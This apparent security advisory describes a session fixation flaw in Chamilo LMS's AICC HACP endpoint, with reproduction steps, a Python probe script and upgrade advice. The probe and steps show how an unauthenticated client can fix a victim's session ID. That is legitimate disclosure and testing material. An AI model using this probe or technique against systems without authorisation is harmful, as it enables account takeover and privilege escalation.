Chamilo LMS Session Fixation Vulnerability in AICC HACP Endpoint

Vulnerability

A session fixation vulnerability has been identified in Chamilo LMS versions prior to 1.11.38 and 2.0.0-RC.3. The issue arises in the AICC HACP endpoint, which takes a session ID from user-controlled request parameters and applies it to the PHP session before the global bootstrap is loaded, so none of the application's normal session handling has run at that point. This lets an attacker choose the session ID in advance. In the classic session fixation chain, the attacker gets a victim's browser to use the attacker-chosen ID, waits for the victim to authenticate, and then presents the same ID to act as the victim, resulting in account takeover.

Impact

Exploitation of this vulnerability allows session hijacking and, with it, takeover of the affected account. If the fixated session belongs to an administrator, the attacker gains administrative privileges, i.e. privilege escalation.

Reproduction

To reproduce this vulnerability, send a request to the AICC HACP endpoint with an attacker-chosen value in the 'aicc_sid' or 'session_id' parameter. The server adopts the supplied value as the PHP session ID without checking it against any existing session. The endpoint requires no authentication, so the session ID can be fixed by an anonymous attacker without any credentials. The condition is confirmed when the session cookie the server sets (or honours on subsequent requests) equals the value that was supplied.
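The probe below automates that check. It is an added example and not Chamilo code: it assumes the operator supplies the full URL of the AICC HACP endpoint, that the parameter is read from the query string (PHP's $_REQUEST covers both query and form parameters), and that the PHP session cookie is named PHPSESSID (PHP's default; change COOKIE_NAME if the instance uses another name). It tries both parameter names from the advisory with a fresh random ID each time and reports whether the server echoed that ID back in its session cookie. Redirects are deliberately not followed, since the Set-Cookie of interest may sit on a 3xx response.

```python
"""Session-fixation probe for the AICC HACP endpoint (constructed example)."""
import secrets
import sys
import urllib.error
import urllib.parse
import urllib.request
from http.cookies import SimpleCookie

COOKIE_NAME = "PHPSESSID"              # assumption: PHP's default session cookie name
PARAMS = ("aicc_sid", "session_id")    # the two parameter names given in the advisory


def make_probe_id() -> str:
    """32 hex characters: valid under PHP's default session.sid_length and
    sid_bits_per_character, so the server cannot reject it on format alone."""
    return secrets.token_hex(16)


def build_probe_url(endpoint: str, param: str, sid: str) -> str:
    """Append ?param=sid (or &param=sid if the URL already has a query)."""
    sep = "&" if urllib.parse.urlparse(endpoint).query else "?"
    return f"{endpoint}{sep}{urllib.parse.urlencode({param: sid})}"


def session_cookie_values(set_cookie_headers) -> list:
    """Every value the server tried to set for the session cookie."""
    values = []
    for header in set_cookie_headers:
        cookie = SimpleCookie()
        cookie.load(header)
        if COOKIE_NAME in cookie:
            values.append(cookie[COOKIE_NAME].value)
    return values


def fixated(sid: str, set_cookie_headers) -> bool:
    """True if the server adopted our chosen ID as its session ID."""
    return sid in session_cookie_values(set_cookie_headers)


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Turn 3xx responses into HTTPError so we can read their headers."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe(endpoint: str) -> dict:
    """Hit the endpoint once per parameter name; map param -> fixated?"""
    opener = urllib.request.build_opener(_NoRedirect)
    results = {}
    for param in PARAMS:
        sid = make_probe_id()
        req = urllib.request.Request(
            build_probe_url(endpoint, param, sid),
            headers={"User-Agent": "session-fixation-probe"},
        )
        try:
            with opener.open(req, timeout=10) as resp:
                headers = resp.headers.get_all("Set-Cookie") or []
        except urllib.error.HTTPError as err:       # 3xx/4xx/5xx still carry cookies
            headers = err.headers.get_all("Set-Cookie") or []
        results[param] = fixated(sid, headers)
    return results


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: probe.py <AICC HACP endpoint URL>")
    for param, hit in probe(sys.argv[1]).items():
        verdict = "VULNERABLE: server adopted the supplied session ID" if hit else "not adopted"
        print(f"{param}: {verdict}")
```

A patched instance should never return the supplied value in its session cookie; a hit on either parameter means the endpoint still lets an unauthenticated client fix the session ID.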

Remediation

Upgrade to Chamilo LMS 1.11.38 or 2.0.0-RC.3, where this vulnerability has been patched. If upgrading is not immediately possible, disable AICC support as a mitigation, since the affected endpoint belongs to that functionality.

Added: Apr 10, 2026, 7:05 PM
Updated: Apr 10, 2026, 7:05 PM

Vulnerability Rating

Custom Algorithm
spread: 3.4
impact: 1.3
exploitability: 7.7
remediation: 7.7
relevance: 5.7
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.